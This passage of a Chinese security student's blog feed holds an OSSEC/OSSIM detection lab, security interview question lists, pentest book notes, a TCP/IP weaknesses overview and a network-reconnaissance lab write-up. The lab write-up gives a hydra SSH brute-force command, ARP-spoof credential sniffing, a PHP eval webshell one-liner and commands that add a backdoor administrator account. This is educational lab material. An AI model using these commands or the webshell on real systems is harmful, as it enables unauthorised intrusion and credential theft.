Agent</td><td>用户名:root;密码:Simplexue123</td></tr><tr><td>Windows 2012</td><td>192.168.1.5</td><td>OSSEC Agent</td><td>用户名:administrator;密码:Simplexue123</td></tr></tbody></table><h3 id="实验过程"><a href="#实验过程" class="headerlink" title="实验过程"></a>实验过程</h3><h4 id="任务一"><a href="#任务一" class="headerlink" title="任务一"></a>任务一</h4><p>1.安装OSSEC HIDS</p><p><img src="https://i.loli.net/2021/04/07/bJtS6UlwXLOIqCY.png" alt="image-20210407201621741"></p><p>2.配置</p><p><img src="https://i.loli.net/2021/04/07/9ZfXv4EDSVwGyjl.png" alt="image-20210407201746103"></p><p>3.在windows2012操作系统(服务器IP地址:192.168.1.5)中,使用putty远程登录OSSIM服务器</p><p><img src="https://i.loli.net/2021/04/07/LGsuzAN7mXBETjb.png" alt="image-20210407202036641"></p><p>4.使用putty终端启动OSSEC代理管理程序,创建新OSSEC代理</p><p><img src="https://i.loli.net/2021/04/07/9GBmsEpkwI7yzTA.png" alt="image-20210407202602565"></p><p><img src="https://i.loli.net/2021/04/07/KmXMJ7vlLq2BAZf.png" alt="image-20210407203548341"></p><p>5.通过CentOS7终端SSH远程登录OSSIM服务器</p><p><img src="https://i.loli.net/2021/04/07/Xk7HQMEV5z3f2A4.png" alt="image-20210407204054614"></p><ol start="6"><li></li></ol><p><img src="https://i.loli.net/2021/04/07/OZVImALkWeNYrl6.png" alt="image-20210407204312076"></p><ol start="7"><li></li></ol><p><img src="https://i.loli.net/2021/04/07/SUzZlBIK7r6Oemv.png" alt="image-20210407204635717"></p><ol start="8"><li></li></ol><p><img src="https://i.loli.net/2021/04/07/CZQ5zoLbr2GMXtS.png" alt="image-20210407205224315"></p><h4 id="任务二"><a href="#任务二" class="headerlink" title="任务二"></a>任务二</h4><p>2.1在windows2012上使用火狐浏览器访问OSSIM集成监测平台Web GUI界面,输入用户名admin和密码Simplexue123进行登录。</p><p><img src="https://i.loli.net/2021/04/07/z6stQgdGv4JiqMO.jpg" alt="img"></p><p><img src="https://i.loli.net/2021/04/07/8IEzhAUcondmwfJ.gif" alt="img"></p><p>2.2 OSSIM系统已经默认设置了很多常规适用的入侵检测规则,我们不需要另行配置就可以直接使用。除此之外,我们还需要在OSSIM集成检测平台上通过修改ossec.conf规则配置文件来设置OSSEC系统的入侵检测规则。在OSSIM web页面中,单击Analysis—>Detection—>HIDS—>Config—>Ossec.conf,可以看到OSSIM集成检测平台已经默认监视了日志文件/var/log/auth.log。如果在Ossec.conf文件中没有找到关于auth.log的监控信息,请自行添加该部分内容的规则配置信息。</p><p><img src="https://i.loli.net/2021/04/07/kPKJIXFdQztV5xs.jpg" alt="img"></p><p>2.3重启OSSIM服务器,重启登录成功后进入图形操作界面,按Ctrl+Alt+F1切换到命令行界面,输入用户名root和密码Simplexue123进行登录,再输入命令exit退出登录,之后按Ctrl+Alt+F7回到图形界面。图形界面和命令行界面的切换登录是为了给OSSEC入侵检测系统提供OSSIM服务器的root用户本地登录检测信息源,以便OSSEC系统获取root用户本地登录的相关日志信息。</p><p>2.4在windows2012上远程连接到服务器192.168.1.200。</p><p><img src="https://i.loli.net/2021/04/07/K2YsXfDNbT7xWid.gif" alt="img"></p><p>2.5在windows2012的OSSIM Web页面上,单击Analysis—> Security Events (SIEM),可以看到,Security Events页面中列出了OSSIM系统预设检测规则适用范围内的所有安全事件日志信息,可以找到通过putty远程登录时相关的SSH登录记录报警信息。该日志信息可作为系统管理员判断本次远程登录是否为非法入侵的重要报警信息。如果OSSIM服务器不允许root用户的远程登录操作,那么root用户的本次远程登录操作将被视为黑客入侵行为。</p><p><img src="https://i.loli.net/2021/04/07/D9TBgXxhZJUikwf.gif" alt="img"></p><p>2.6在OSSIM web页面搜索框输入ossec,回车进行ossec报警数据过滤。</p><p><img src="https://i.loli.net/2021/04/07/VtO4QHBpsZf5oqA.jpg" alt="img"></p><p>2.7因为OSSEC入侵检测系统监控了/var/log/auth.log文件,所以在OSSIM集成检测平台的OSSIM Web页面,除了记录SSH远程登录的相关安全日志信息,还会记录OSSEC报警信息,该报警信息可作为判断本次远程登录是否为非法入侵的重要依据。</p><h4 id="任务三"><a href="#任务三" class="headerlink" title="任务三"></a>任务三</h4><p>3.1使用putty工具远程登录OSSIM服务器,在打开的终端中,使用CD命令进入“/var/ossec/rules”目录(该目录为OSSEC服务器的检测规则文件存储目录),并使用ls命令查看所有的OSSEC服务器端检测规则文件。可以修改这些文件的预设规则配置,来实现用户需要的自定义系统安全检测规则。其中,sshd_rules.xml为我们本实验任务需要自定义检测规则的文件,通过自定义规则,以实现收集root用户远程非法登录OSSIM服务器的报警信息的目的,为判定、分析入侵行为和动机提供重要依据。</p><p><img src="https://i.loli.net/2021/04/07/42mT9Kpu5efGrwi.jpg" alt="img"></p><p>3.2修改sshd_rules.xml规则文件中的其中一条(rule id号为5719),将level级别设置为2(level级别越高,优先级就越高,与该规则对应的报警信息将更优先被OSSIM服务器响应和处理),告警阈值设置为2次。该规则表示:当非法用户存在2次以上远程登录尝试操作,且操作时间超过30秒,那么将触发非法远程登录尝试报警。修改完sshd_rules.xml文件后保存并退出编辑状态。</p><h4 id="任务四"><a href="#任务四" class="headerlink" title="任务四"></a>任务四</h4><p>4.1在OSSIM集成检测平台上设置规则,监测CentOS7用户情况。在CentOS7终端查看代理的配置文件,可以看到OSSIM集成检测平台默认监控/var/log/secure文件,如果没有该文件监控内容,请自行添加。</p><p><img src="https://i.loli.net/2021/04/07/Zto4dqBJrPQyljX.jpg" alt="img"></p><p>4.2重启OSSIM服务器(192.168.1.200)。</p><p><img src="https://i.loli.net/2021/04/07/c7GiXEqQnSvofyO.jpg" alt="img"></p><p>4.3使用工具模拟攻击者远程登录服务器(用户名root和密码Simplexue123)。</p><p>4.4在服务器终端输入命令“adduser simpleware”、“passwd simpleware”,添加新用户simpleware,并将其密码设为Simplexue123。</p><p><img src="https://i.loli.net/2021/04/07/yFMbPjYWcRhA7Ln.jpg" alt="img"></p><p><img src="C:/Users/loeoe/AppData/Local/Temp/msohtmlclip1/01/clip_image008.jpg" alt="img"></p><p>4.5回到OSSIM Web页面上,进行OSSEC警报数据的过滤,可以看到与CentOS7添加新用户相关的OSSEC报警信息。</p><p><img src="https://i.loli.net/2021/04/07/gxnNAc1rQTqlISf.jpg" alt="img"></p><p>4.6查看入侵检测系统检测到的报警信息,获得报警信息的字段特征。</p><p><img src="https://i.loli.net/2021/04/07/FBGJc4W9Yw6LeoE.jpg" alt="img"></p><p>因此OSSIM集成监测平台web页面中监测到的OSSEC代理新建用户的报警信息的signature:ossec:New user added to the system</p><h4 id="任务五"><a href="#任务五" class="headerlink" title="任务五"></a>任务五</h4><p>5.1在CentOS7的终端修改ossec.conf文件,向该文件中添加如下内容,实现监控Web服务器的访问日志的功能。编辑完后按esc键退出文件编辑状态,并输入:wq命令保存文件。</p><p><img src="https://i.loli.net/2021/04/07/Zto4dqBJrPQyljX.jpg" alt="img"></p><p>5.2在终端输入命令“/var/ossec/bin/ossec-control restart”,重新启动OSSEC服务。</p><p><img src="https://i.loli.net/2021/04/07/POJcUdmpXwB1sEi.jpg" alt="img"></p><p>5.3在windows2012上访问被禁止访问的目录。在windows2012(IP为192.168.1.5)的火狐浏览器上新打开一个页面,访问<a href="http://192.168.1.6/dvwa/config%EF%BC%8C%E6%8F%90%E7%A4%BA%E4%BF%A1%E6%81%AF%E4%B8%BANot">http://192.168.1.6/dvwa/config,提示信息为Not</a> Found。</p><p><img src="https://i.loli.net/2021/04/07/yFMbPjYWcRhA7Ln.jpg" alt="img"></p><p>5.4回到OSSIM Web页面上,进行OSSEC警报数据的过滤,可以看到访问禁止目录时的报警信息。</p><h3 id="实验感想"><a href="#实验感想" class="headerlink" title="实验感想"></a>实验感想</h3><p>通过此次实验:</p><p>1.掌握在不同的操作系统环境下安装和配置OSSEC代理。<br>2.了解工具PuTTY的基本功能,掌握使用该工具远程连接机器的方法。<br>3.通过安装OSSEC代理,掌握PuTTY工具的实验,掌握配置OSSEC代理的方法,了解OSSEC入侵检测系统的架构、功能以及实现方式,具备构建入侵检测环境的能力。<br>4.掌握OSSIM系统的入侵检测规则设置方法,并能够根据报警信息做入侵行为分析,具备信息系统入侵检测和防范、维护系统安全的职业能力。</p>]]></content>
<categories>
<category> 安全 </category>
</categories>
<tags>
<tag> 安全 </tag>
</tags>
</entry>
<entry>
<title>绿盟安服面试(实习)</title>
<link href="/2021/04/05/%E7%BB%BF%E7%9B%9F/"/>
<url>/2021/04/05/%E7%BB%BF%E7%9B%9F/</url>
<content type="html"><![CDATA[<p>时间:2021-4-5</p><p>时长:25min</p><p>面试过程</p><p>1.自我介绍</p><p>2.SQL注入经常使用什么函数</p><p>3.渗透测试的流程</p><p>4.关于云安全</p><p>5.关于ISO 27001 风险评估</p><p>6.讲一下SSRF</p><p>7.还了解什么漏洞</p><p>8.同源策略</p><p>9.Linux相关</p><ul><li>怎么查看进程PID</li><li>密码存放在哪里</li><li>passwd和shadow有什么联系</li></ul><p>10.机器学习相关</p><p>因为简历上有写NLP自然语言处理。</p><p>绿盟的面试体验很好,问的也都是基础的,和简历相关的。</p>]]></content>
<categories>
<category> 面试 </category>
</categories>
<tags>
<tag> 面试 </tag>
</tags>
</entry>
<entry>
<title>360安全工程师面试(实习)</title>
<link href="/2021/03/30/360/"/>
<url>/2021/03/30/360/</url>
<content type="html"><![CDATA[<p> 时间:2021-3-30 </p><p> 时长:45min </p><p> 面试类型:电话面试 </p><p> 目前为止遇到的最专业最耐心的面试官。 (也是最难的一次面试)</p><p> 我是点进22届暑期实习投的,却发现投的是正式职位。。。啊,这。 </p><p> <strong>面试内容如下:</strong> </p><p> 1.自我介绍 </p><p> 2.WAF及其绕过方式 </p><p> 3.IPS/IDS/HIDS </p><p> 4.云安全 </p><p> 5.怎么绕过安骑士/安全狗等 </p><p> 6.Gopher扩展攻击面 </p><p> 7.Struct2漏洞 </p><p> 8.UDF提权 </p><p> 9.DOM XSS </p><p> 10.数据库提权 </p><p> 11.怎么打Redis </p><p> 12.内网渗透 </p><p> 13.容器安全 </p><p> 14.k8s docker逃逸 </p><p> 15.linux、windows命令:过滤文件、查看进程环境变量 </p><p> 16.站库分离怎么拿webshell </p><p> 总之,面试官很专业,循循善诱,可惜自己实战经验太少,很多问题答不上。 </p><p> 继续努力。加油少年!</p>]]></content>
<categories>
<category> 面试 </category>
</categories>
<tags>
<tag> 面试 </tag>
</tags>
</entry>
<entry>
<title>渗透测试初学者笔记</title>
<link href="/2021/03/27/%E5%88%9D%E5%AD%A6%E8%80%85/"/>
<url>/2021/03/27/%E5%88%9D%E5%AD%A6%E8%80%85/</url>
<content type="html"><![CDATA[<blockquote><p>学校图书馆借了一本书《渗透测试完全初学者指南》,讲的很基础,对初学者很友好,略作笔记。</p></blockquote><h3 id="第五章-信息收集"><a href="#第五章-信息收集" class="headerlink" title="第五章-信息收集"></a>第五章-信息收集</h3><h4 id="开源情报"><a href="#开源情报" class="headerlink" title="开源情报"></a>开源情报</h4><ul><li>Netcraft</li><li>whois</li><li>DNS侦察<ul><li>nslookup</li><li>host</li><li>区域传输</li></ul></li><li>邮件地址</li><li>Maltego</li></ul><h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h4><ul><li>手动</li><li>nmap</li></ul><h3 id="第六章-漏洞检测"><a href="#第六章-漏洞检测" class="headerlink" title="第六章-漏洞检测"></a>第六章-漏洞检测</h3><ul><li>Nmap</li><li>Nessus<ul><li>扫描策略</li><li>进行扫描</li><li>漏洞评级</li><li>扫描器的必要性</li><li>导出结果</li></ul></li><li>Nmap脚本引擎(NSE)(/usr/share/nmap/scripts)</li><li>metasploit</li><li>nikto</li><li>人工分析</li></ul><h3 id="第七章-流量捕获"><a href="#第七章-流量捕获" class="headerlink" title="第七章-流量捕获"></a>第七章-流量捕获</h3><ul><li>Wireshark</li><li>ARP缓存攻击</li><li>DNS缓存攻击</li><li>SSL攻击</li><li>SSL Stripping</li></ul><h3 id="第八章-漏洞利用"><a href="#第八章-漏洞利用" class="headerlink" title="第八章-漏洞利用"></a>第八章-漏洞利用</h3><ul><li>MS-08-067</li><li>WebDAV</li><li>phpMyAdmin</li><li>下载敏感文件</li><li>第三方软件漏洞</li><li>攻击第三方Web应用</li><li>攻击系统服务缺陷</li><li>攻击开源NFS漏洞</li></ul><h3 id="第九章-密码攻击"><a href="#第九章-密码攻击" class="headerlink" title="第九章-密码攻击"></a>第九章-密码攻击</h3><ul><li>密码管理</li><li>在线密码攻击<ul><li>字典</li><li>Hydra</li></ul></li><li>离线密码攻击<ul><li>还原Windows SAM哈希值</li><li>提取哈希</li><li>LM\NTLM算法</li><li>破解 linux密码</li><li>破解配置文件密码</li><li>彩虹表</li><li>在线密码破解</li><li>Windows Credential Editor提取内存中的密码明文</li></ul></li></ul><h3 id="第十章-客户端攻击"><a href="#第十章-客户端攻击" class="headerlink" title="第十章-客户端攻击"></a>第十章-客户端攻击</h3><ul><li>metasploit</li><li>浏览器漏洞</li><li>PDF漏洞</li><li>Java漏洞</li><li>Brower_autopwn</li><li>Winamp</li></ul><h3 id="第十一章-社会工程学"><a href="#第十一章-社会工程学" class="headerlink" title="第十一章-社会工程学"></a>第十一章-社会工程学</h3><ul><li>SET</li><li>鱼叉式钓鱼攻击</li><li>web攻击</li><li>群发邮件攻击</li><li>组合攻击</li></ul><h3 id="第十二章-免杀"><a href="#第十二章-免杀" class="headerlink" title="第十二章-免杀"></a>第十二章-免杀</h3><ul><li>杀毒软件原理</li><li>规避杀毒软件</li></ul><h3 id="第十三章-深度渗透"><a href="#第十三章-深度渗透" class="headerlink" title="第十三章-深度渗透"></a>第十三章-深度渗透</h3><ul><li>Meterpreter</li><li>本地权限提升</li><li>本地信息收集</li><li>横向移动</li><li>跳板</li><li>持久化</li></ul><h3 id="第十四章-Web应用测试"><a href="#第十四章-Web应用测试" class="headerlink" title="第十四章-Web应用测试"></a>第十四章-Web应用测试</h3><ul><li>Burp</li><li>SQL注入</li><li>Xpath注入</li><li>本地文件包含</li><li>远程文件包含</li><li>命令执行</li><li>跨站脚本</li><li>跨站请求伪造</li></ul><h3 id="第十五章-攻击无线网络"><a href="#第十五章-攻击无线网络" class="headerlink" title="第十五章-攻击无线网络"></a>第十五章-攻击无线网络</h3><h3 id="第十六章-缓冲区溢出"><a href="#第十六章-缓冲区溢出" class="headerlink" title="第十六章-缓冲区溢出"></a>第十六章-缓冲区溢出</h3><h3 id="第十八章-SEH覆盖"><a href="#第十八章-SEH覆盖" class="headerlink" title="第十八章-SEH覆盖"></a>第十八章-SEH覆盖</h3><h3 id="第十九章-其他"><a href="#第十九章-其他" class="headerlink" title="第十九章-其他"></a>第十九章-其他</h3><ul><li>模糊测试</li><li>移植代码</li><li>MSF模块编写</li><li>攻击缓解</li></ul><h3 id="第十九章-智能收集渗透"><a href="#第十九章-智能收集渗透" class="headerlink" title="第十九章-智能收集渗透"></a>第十九章-智能收集渗透</h3><ul><li>移动设备攻击向量</li><li>智能手机渗透框架</li><li>远程攻击</li><li>客户端攻击</li><li>恶意应用程序</li><li>移动平台渗透</li></ul>]]></content>
<categories>
<category> 渗透 </category>
</categories>
<tags>
<tag> 渗透 </tag>
</tags>
</entry>
<entry>
<title>美团安全工程师面试(实习)</title>
<link href="/2021/03/26/meituan/"/>
<url>/2021/03/26/meituan/</url>
<content type="html"><![CDATA[<p>2021-3-26 </p><p> 面试官是一位会弹吉他的安全工程师,比较和蔼,没有问刁钻的问题。 </p><p> 面试时间总共15分钟,我也不知道为啥这么短,可能那边有业务要做吧。 </p><p> <strong>问题如下:</strong> </p><p> 1.自我介绍 </p><p> 2.平时怎么学安全的 </p><p> 3.每天有多长时间学安全 </p><p> 4.SQL注入有哪些 </p><p> 5.给你一个URL,怎么判断注入 </p><p> 6.SQL注入防范 </p><p> 7.平时有看安全方面的文章吗,讲一篇 </p><p> 讲了一下昨晚看的DNSlog注入 </p><p> 8.讲一下CTF </p><p> 9.讲一下你做过的渗透 </p><p> 最后 你有什么要问的吗? </p><p> 1.怎么学习安全 </p><p> 2.甲方和乙方的安全有什么不同 </p><p> <strong>面试建议</strong> </p><p> 其实提前看了几篇美团技术部的文章和面试官写的web蜜罐,但我没讲。 </p><p> 可以提前查一下面试官的研究方向,如果正好是你擅长的,那就好了。如果是你不擅长的,就尽量把话题引导其他方向,让面试官跟着你的项目走。</p>]]></content>
<categories>
<category> 面试 </category>
</categories>
<tags>
<tag> 面试 </tag>
</tags>
</entry>
<entry>
<title>网络侦察实验</title>
<link href="/2021/03/25/%E4%BE%A6%E5%AF%9F/"/>
<url>/2021/03/25/%E4%BE%A6%E5%AF%9F/</url>
<content type="html"><![CDATA[<h1 id="网络侦察实验"><a href="#网络侦察实验" class="headerlink" title="网络侦察实验"></a>网络侦察实验</h1><h3 id="实验背景"><a href="#实验背景" class="headerlink" title="实验背景"></a>实验背景</h3><p>随着时代的发展和网络的普及,在世界各国、各层次的计算机网络中,储存着大量公开资料和机密资料,由于网络漏洞的存在,为“黑客”入侵计算机网络系统获取机密资料提供了很多便利,这些资料引起了各国军事情报部门的重视,都大力开展利用计算机网络系统来获取情报资料的研究和尝试,这便是网络侦察。</p><p>网络侦查是指黑客为了更加有效地实施攻击而在攻击前或攻击过程中对目标主机的所有探测活动。网络侦查有时也被称为“踩点”。通常“踩点”包括以下内容:目标主机的域名、IP地址、操作系统类型、开放了哪些端口,以及这些端口后面运行着什么样的应用程序,这些应用程序有没有漏洞等。那么如何收集信息呢?可以利用与技术无关的“社会工程学”、搜索引擎以及扫描工具。</p><p>本实验旨在通过在企业复杂网络场景下的网络侦查应用实战,让学生深刻理解网络侦查的概念、特性和原理,掌握网络侦查相关技术,具备对网络进行侦查、渗透、敏感信息获取以及防网络侦查的技术能力,这对于学生的信息安全技术能力提升、国家网络空间安全战略实施,都有非常重要的意义。</p><h3 id="实验任务"><a href="#实验任务" class="headerlink" title="实验任务"></a>实验任务</h3><p>任务一 使用nmap、ettercap进行网络侦查和密码嗅探;<br>任务二 使用crunch、hydra暴力破解ssh服务登陆密码;<br>任务三 使用ssh登录目标机,获得敏感信息;<br>任务四 获取目标网站的webshell权限,控制目标机,获得敏感信息。</p><h3 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h3><ul><li>了解网络侦查、信息收集、漏洞挖掘和利用的基本概念以及常用的信息收集和安全漏洞扫描工具,认知常见的网络侦查手段和企业网络安全漏洞。</li><li>掌握nmap工具的功能和操作方法,并能够分析检侧结果,能够运用这些工具解决目标网络信息探测、漏洞挖掘等常见的安全问题。</li><li>了解ettercap嗅探工具的基本功能,掌握常见的嗅探相关服务和应用的用户名和密码的方法。</li><li>了解crunch的基本功能,掌握利用crunch生成密码字典文件的方法。</li><li>了解hydra密码爆破工具的基本功能和使用方法,掌握常见的爆破服务和应用的用户名和密码的方法。</li><li>熟悉网站wenshell的概念,理解上传webshell、获取webshell权限的意义和方法,掌握获取webshell权限基础上控制目标机的方法。</li><li>通过nmap、ettercap、crunch和hydra等工具的学习和使用,能够融会贯通,掌握相关服务如ftp、web等漏洞挖掘、渗透、攻击和利用的原理和方法,掌握自主学习和实践主流企业网络扫描工具的功能、操作技巧、检测结果分析、网络侦查、漏洞挖掘的常用方法,具备企业复杂网络信息安全管理的职业能力和终身学习能力。</li></ul><h3 id="实验工具"><a href="#实验工具" class="headerlink" title="实验工具"></a>实验工具</h3><ul><li>Nmap(集成于kali linux)</li><li>ettercap(集成于kali linux)</li><li>crunch(集成于kali linux)</li><li>hydra(集成于kali linux)</li><li>Firefox(54.2.0)</li><li>Rdesktop</li></ul><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h3><table><thead><tr><th>操作系统</th><th>IP地址</th><th>服务器角色</th><th>登录账户密码</th></tr></thead><tbody><tr><td>kali Linux</td><td>192.168.1.2</td><td>操作机</td><td>用户名:root;密码:Simplexue123</td></tr><tr><td>CentOS7</td><td>192.168.1.3</td><td>目标机</td><td>用户名:root;密码:Simplexue123</td></tr><tr><td>Windows2012</td><td>192.168.1.4</td><td>目标机</td><td>用户名:administrator;密码:Simplexue123</td></tr></tbody></table><h3 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>实验步骤</h3><h4 id="任务一"><a href="#任务一" class="headerlink" title="任务一"></a>任务一</h4><p>1.扫描存活的主机</p><p><img src="https://i.loli.net/2021/03/25/zPknCDVjpW3Jmlx.png" alt="image-20210325150711857"></p><p>2.使用嗅探工具对目标机的vsftpd服务进行嗅探。</p><p>通过设置监听网卡、主机、开启arp欺骗、启动嗅探等步骤来嗅探网络内的数据包,获取ftp用户名和密码。</p><p><img src="https://i.loli.net/2021/03/25/zlgeGuf3kRQbNYM.png" alt="image-20210325152226044"></p><p><img src="https://i.loli.net/2021/03/25/iZNCDe15ytPux4G.png" alt="image-20210325153309224"></p><h4 id="任务二"><a href="#任务二" class="headerlink" title="任务二"></a>任务二</h4><p>利用kali集成的crunch工具,生成密码字典文件。<br>使用hydra工具暴力破解ssh服务的登陆密码,以便完全控制目标主机系统。</p><p>使用命令<code>crunch 9 9 password.txt -p hacker+123456</code>生成密码</p><p>生成9位的数字字母组合,输出到password.txt文件</p><p><img src="https://i.loli.net/2021/03/25/A9qhKSljfrw3dCU.png" alt="image-20210325154745860"></p><p>使用生成的密码字典进行爆破</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -L hacker.txt -P password.txt -t 1 -vV -e ns 192.168.1.3 ssh</span><br></pre></td></tr></table></figure><p>破解得到密码:hacker123</p><h4 id="任务三"><a href="#任务三" class="headerlink" title="任务三"></a>任务三</h4><p>使用ssh登录目标机并获取key值,获得敏感信息</p><p>直接利用 爆破得到的密码进行登陆</p><p>ssh <a href="mailto:hacker@192.168.1.3">hacker@192.168.1.3</a></p><p><img src="https://i.loli.net/2021/03/25/2nstiZqjApkCKHP.png" alt="image-20210325155633360"></p><p><img src="https://i.loli.net/2021/03/25/Jmz6WETX9Q8jGPh.png" alt="image-20210325155802866"></p><p>ls -a命令列出文件:1.key</p><p>cat 1.key</p><p>ettercap</p><h4 id="任务四"><a href="#任务四" class="headerlink" title="任务四"></a>任务四</h4><p>获取目标网站的webshell权限,控制目标机,获得敏感信息</p><p>制作一句话木马和上传表单</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?php @eval($_POST['attack']) ?></span><br></pre></td></tr></table></figure><p>在浏览器另外一个页面快速打开<code>http://192.168.1.4/index.php?module=eventregistration&action=eventsCalendar</code>,获得时间戳,分析可知上传的文件名以时间戳+下划线+原文件名称来命名。</p><p>编写脚本并运行,获得上传的文件的URL路径。</p><p><img src="https://i.loli.net/2021/03/25/RhfQO97VjGwEWia.png" alt="image-20210325183510613"></p><p>写入命令</p><p><code>http://192.168.1.4/ tmp/1516041535_exp.php?cmd=system('' )</code></p><p>添加新用户<code>net user hacker Beijing123 /add</code></p><p>把hacker用户添加到管理员组,并远程连接目标机,远程连接的时候注意远程连接的端口。</p><p>以hacker用户(用户名:hacker、密码:Beijing123)身份登录目标机系统。</p><p>设置目标机C:\2.key文件的可读权限,并查看该文件的具体内容。</p>]]></content>
<categories>
<category> 渗透 </category>
</categories>
<tags>
<tag> 渗透 </tag>
</tags>
</entry>
<entry>
<title>阿里安全工程师面试(实习)</title>
<link href="/2021/03/20/alibaba/"/>
<url>/2021/03/20/alibaba/</url>
<content type="html"><![CDATA[<p>3.10 </p><p> 时常:30min </p><p> 1.自我介绍 </p><p> 2.常用的密码算法,用法是什么 </p><p> 3.SSL协议 </p><p> 4.你是怎么学习安全知识的 </p><p> 5.讲一下你对未来的规划 </p><p> 6.企业常用的安全防御技术有哪些 </p><p> 7.项目上的问题,你做了什么贡献。问细节 </p><p> 面试官应该很年轻,跟我讲了一些他的经历,没有问刁钻的问题,很友好。 </p><p> 3.16 收到感谢信 </p><p> 深知自己不足,道路漫长,继续加油! </p>]]></content>
<categories>
<category> 面试 </category>
</categories>
<tags>
<tag> 面试 </tag>
</tags>
</entry>
<entry>
<title>TCP/IP协议脆弱性分析</title>
<link href="/2021/03/19/TCPIP/"/>
<url>/2021/03/19/TCPIP/</url>
<content type="html"><![CDATA[<h3 id="TCP-x2F-IP协议簇"><a href="#TCP-x2F-IP协议簇" class="headerlink" title="TCP/IP协议簇"></a>TCP/IP协议簇</h3><p>TCP/IP提供了点对点链接的机制,将资料应该如何封装、寻址、传输、路由以及在目的地如何接收,都加以标准化。它将软件通信过程抽象化为四个抽象层,采取协议堆栈的方式,分别实现出不同通信协议。协议族下的各种协议,依其功能不同,分别归属到这四个层次结构之中,常视为是简化的七层OSI模型。</p><p>TCP(传输控制协议)和IP(网际协议)</p><p>TCP/IP 意味着 TCP 和 IP 在一起协同工作。</p><p>TCP 负责应用软件(比如您的浏览器)和网络软件之间的通信。</p><p>IP 负责计算机之间的通信。</p><p>TCP 负责将数据分割并装入 IP 包,然后在它们到达的时候重新组合它们。</p><p>IP 负责将包发送至接受者。</p><h3 id="安全隐患"><a href="#安全隐患" class="headerlink" title="安全隐患"></a>安全隐患</h3><p>1.链路层攻击</p><p>在TCP/IP网络中,链路层这一层次的复杂程度是最高的。其中最常见的攻击方式通常是网络嗅探组成的TCP/IP协议的以太网。当前,我国应用较为广泛的局域网是以太网,且其共享信道利用率非常高。以太网卡有两种主要的工作方式,一种是一般工作方式,另一种是较特殊的混杂方式。这一情况下,很可能由于被攻击的原因而造成信息丢失情况,且攻击者可以通过数据分析来获取账户、密码等多方面的关键数据信息。</p><p>2.ARP欺骗</p><p>ARP(地址解析协议)是根据IP地址获取物理地址的一个TCP/IP协议。通常情况下,在IP数据包发送过程中会存在一个子网或者多个子网主机利用网络级别第一层,而ARP则充当源主机第一个查询工具,在未找到IP地址相对应的物理地址时,将主机和IP地址相关的物理地址信息发送给主机。与此同时,源主机将包括自身IP地址和ARP检测的应答发送给目的主机。如果ARP识别链接错误,这样的话ARP直接应用可疑信息,那么可疑信息就会很容易进入目标主机当中。ARP协议没有状态,不管有没有收到请求,主机会将任何受到的ARP相应自动缓存。如果信息中带有病毒,采用ARP欺骗就会导致网络信息安全泄露。因此,在ARP识别环节,应加大保护,建立更多的识别关卡,不能只简单通过IP名进行识别,还需充分参考IP相关性质等。</p><p>3.ICMP欺骗</p><p>ICMP协议也是因特网控制报文协议,主要用在主机与路由器之间进行控制信息传递。通过这一协议可对网络是否通畅、主机是否可达、路由是否可用等信息进行控制。一旦出现差错,数据包会利用主机进行即时发送,并自动反回描述错误的信息。该协议在网络安全当中是十分重要的协议。但由于自身特点的原因,其极易受到入侵,通常而言,目标主机在长期发送大量ICMP数据包的情况下,会造成目标主机占用大量CPU资源,最终造成系统瘫痪。</p><p>4.IP欺骗</p><p>在传输层还存在网络安全问题。如在网络安全领域中,IP欺骗就是隐藏自己的有效手段,主要是通过将自身IP地址进行伪造,并向目标主机发送恶意的请求,攻击主机,而主机却因为IP地址被隐藏而无法准确确认攻击源。或者通过获取目标主机信任而趁机窃取相关的机密信息。在DOS攻击中往往会使用IP欺骗,这是因为数据包地址来源较广泛,无法进行有效过滤,从而使IP基本防御的有效性大幅度下降。此外,在ICMP传输通道,由于ICMP是IP层的组成部分之一,在IP软件中任何端口向ICMP发送一个PING文件,借此用作申请,申请文件传输是否被允许,而ICMP会做出应答,这一命令可检测消息的合法性。所有申请传输的数据基本上传输层都会同意,造成这一情况的原因主要是PING软件编程无法智能识别出恶意信息,一般网络安全防护系统与防火墙会自动默认PING存在,从而忽视其可能带来的安全风险。</p><p>5.DNS欺骗</p><p>对于因特网而言,IP地址与域名均是一一对应的,这两者之间的转换工作,被称为域名解析。而DNS就是域名解析的服务器。DNS欺骗指的是攻击方冒充域名服务器的行为,使用DNS欺骗能将错误DNS信息提供给目标主机。所以说,通过DNS欺骗可误导用户进入非法服务器,让用户相信诈骗IP。另外,PTP网络上接口接受到不属于主机的数据,这也是应用层存在的安全问题,一些木马病毒可趁机入侵,造成数据泄露,从而引发网络安全问题。</p><h3 id="脆弱性分析"><a href="#脆弱性分析" class="headerlink" title="脆弱性分析"></a>脆弱性分析</h3><p>1.不能提供可靠的身份验证</p><p>2.不能有效防止信息泄露</p><p>3.没有提供可靠的信息完整性验证</p><p>4.无法控制资源占有和分配</p><h3 id="攻击方法"><a href="#攻击方法" class="headerlink" title="攻击方法"></a>攻击方法</h3><ul><li>IP欺骗</li><li>TCP会话劫持</li><li>SYN Flooding</li><li>死亡之ping</li><li>RST和FIN攻击</li></ul><h3 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h3><p>真正防御针对网络协议脆弱性的攻击,需要从管理、技术、政策等多方面来配合。希望随着网络安全技术的提高和IPsec的逐步完善,解决现存的协议脆弱性问题。</p><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ul><li>百度/维基百科</li><li>菜鸟TCP/IP教程</li><li>典型的TCP/IP协议脆弱性及常见攻击方法分析(空军工程大学学报)</li></ul>]]></content>
<categories>
<category> blog </category>
</categories>
<tags>
<tag> 安全 </tag>
</tags>
</entry>
<entry>
<title>leetcode15 - 3sum</title>
<link href="/2021/03/18/%E7%AE%97%E6%B3%95/"/>
<url>/2021/03/18/%E7%AE%97%E6%B3%95/</url>
